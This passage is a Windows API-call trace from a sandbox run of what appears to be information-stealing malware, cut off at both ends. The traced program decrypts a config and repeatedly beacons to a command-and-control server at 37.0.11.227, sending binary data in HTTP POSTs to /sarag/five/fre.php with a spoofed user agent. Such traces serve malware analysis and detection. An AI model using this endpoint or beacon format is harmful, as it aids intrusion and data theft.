(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0321.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.824] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0321.824] GetProcessHeap () returned 0x690000 [0321.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0321.824] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0321.824] GetProcessHeap () returned 0x690000 [0321.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0321.825] GetProcessHeap () returned 0x690000 [0321.825] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.826] GetProcessHeap () returned 0x690000 [0321.826] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.826] GetProcessHeap () returned 0x690000 [0321.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0321.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0321.842] GetProcessHeap () returned 0x690000 [0321.842] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0321.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.843] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0321.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.844] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0321.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.845] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0321.845] GetProcessHeap () returned 0x690000 [0321.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0321.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.847] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0321.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.848] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0321.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.849] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0321.849] GetProcessHeap () returned 0x690000 [0321.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0321.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0321.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.851] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0321.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.851] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0321.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0321.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0321.852] GetProcessHeap () returned 0x690000 [0321.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0321.852] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0321.853] GetProcessHeap () returned 0x690000 [0321.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0321.853] socket (af=2, type=1, protocol=6) returned 0xb0c [0321.853] connect (s=0xb0c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0321.877] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0321.877] GetProcessHeap () returned 0x690000 [0321.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0321.877] GetProcessHeap () returned 0x690000 [0321.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0321.878] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.879] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0321.879] GetProcessHeap () returned 0x690000 [0321.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0321.879] GetProcessHeap () returned 0x690000 [0321.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.880] GetProcessHeap () returned 0x690000 [0321.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0321.880] GetProcessHeap () returned 0x690000 [0321.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0321.881] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0321.881] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0321.881] GetProcessHeap () returned 0x690000 [0321.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0321.881] GetProcessHeap () returned 0x690000 [0321.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0321.882] send (s=0xb0c, buf=0x6ad508*, len=242, flags=0) returned 242 [0321.883] send (s=0xb0c, buf=0x6aba40*, len=159, flags=0) returned 159 [0321.883] GetProcessHeap () returned 0x690000 [0321.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0321.883] recv (in: s=0xb0c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0321.953] GetProcessHeap () returned 0x690000 [0321.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0321.954] GetProcessHeap () returned 0x690000 [0321.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0321.954] GetProcessHeap () returned 0x690000 [0321.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0321.954] GetProcessHeap () returned 0x690000 [0321.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0321.955] closesocket (s=0xb0c) returned 0 [0321.956] GetProcessHeap () returned 0x690000 [0321.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0321.956] GetProcessHeap () returned 0x690000 [0321.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0321.957] GetProcessHeap () returned 0x690000 [0321.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0321.957] GetProcessHeap () returned 0x690000 [0321.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0321.957] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1858) returned 0xb0c [0321.959] Sleep (dwMilliseconds=0xea60) [0321.961] GetProcessHeap () returned 0x690000 [0321.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0321.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.973] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0321.988] GetProcessHeap () returned 0x690000 [0321.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0321.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.989] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0321.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.990] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.005] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.005] GetProcessHeap () returned 0x690000 [0322.005] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0322.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.006] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.007] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.008] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0322.008] GetProcessHeap () returned 0x690000 [0322.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.009] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.009] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.011] GetProcessHeap () returned 0x690000 [0322.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0322.012] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0322.012] GetProcessHeap () returned 0x690000 [0322.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0322.012] GetProcessHeap () returned 0x690000 [0322.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.013] GetProcessHeap () returned 0x690000 [0322.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.013] GetProcessHeap () returned 0x690000 [0322.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0322.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0322.025] GetProcessHeap () returned 0x690000 [0322.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0322.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.026] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0322.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.027] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.027] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.027] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.027] GetProcessHeap () returned 0x690000 [0322.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0322.029] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.029] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0322.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.030] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0322.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.031] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0322.031] GetProcessHeap () returned 0x690000 [0322.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.032] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0322.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.033] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0322.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.033] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0322.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.034] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0322.034] GetProcessHeap () returned 0x690000 [0322.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0322.034] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0322.034] GetProcessHeap () returned 0x690000 [0322.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0322.034] socket (af=2, type=1, protocol=6) returned 0xb10 [0322.035] connect (s=0xb10, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0322.079] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0322.093] GetProcessHeap () returned 0x690000 [0322.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0322.093] GetProcessHeap () returned 0x690000 [0322.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0322.094] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.095] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0322.095] GetProcessHeap () returned 0x690000 [0322.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0322.095] GetProcessHeap () returned 0x690000 [0322.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.096] GetProcessHeap () returned 0x690000 [0322.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0322.096] GetProcessHeap () returned 0x690000 [0322.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0322.097] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0322.098] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0322.098] GetProcessHeap () returned 0x690000 [0322.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0322.098] GetProcessHeap () returned 0x690000 [0322.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0322.098] send (s=0xb10, buf=0x6ad508*, len=242, flags=0) returned 242 [0322.099] send (s=0xb10, buf=0x6aba40*, len=159, flags=0) returned 159 [0322.099] GetProcessHeap () returned 0x690000 [0322.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0322.099] recv (in: s=0xb10, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0322.170] GetProcessHeap () returned 0x690000 [0322.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0322.172] GetProcessHeap () returned 0x690000 [0322.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0322.172] GetProcessHeap () returned 0x690000 [0322.172] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0322.173] GetProcessHeap () returned 0x690000 [0322.173] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0322.173] closesocket (s=0xb10) returned 0 [0322.174] GetProcessHeap () returned 0x690000 [0322.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0322.174] GetProcessHeap () returned 0x690000 [0322.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0322.174] GetProcessHeap () returned 0x690000 [0322.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0322.174] GetProcessHeap () returned 0x690000 [0322.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0322.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x185c) returned 0xb10 [0322.191] Sleep (dwMilliseconds=0xea60) [0322.193] GetProcessHeap () returned 0x690000 [0322.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0322.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0322.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0322.215] GetProcessHeap () returned 0x690000 [0322.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0322.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.220] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0322.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.222] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0322.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.223] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0322.223] GetProcessHeap () returned 0x690000 [0322.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0322.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.225] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0322.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.226] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0322.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0322.227] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0322.227] GetProcessHeap () returned 0x690000 [0322.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0322.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.228] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0322.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.229] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0322.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.230] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0322.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0322.232] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0322.232] GetProcessHeap () returned 0x690000 [0322.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0322.232] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0322.232] GetProcessHeap () returned 0x690000 [0322.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0322.232] GetProcessHeap () returned 0x690000 [0322.233] HeapFree (in: 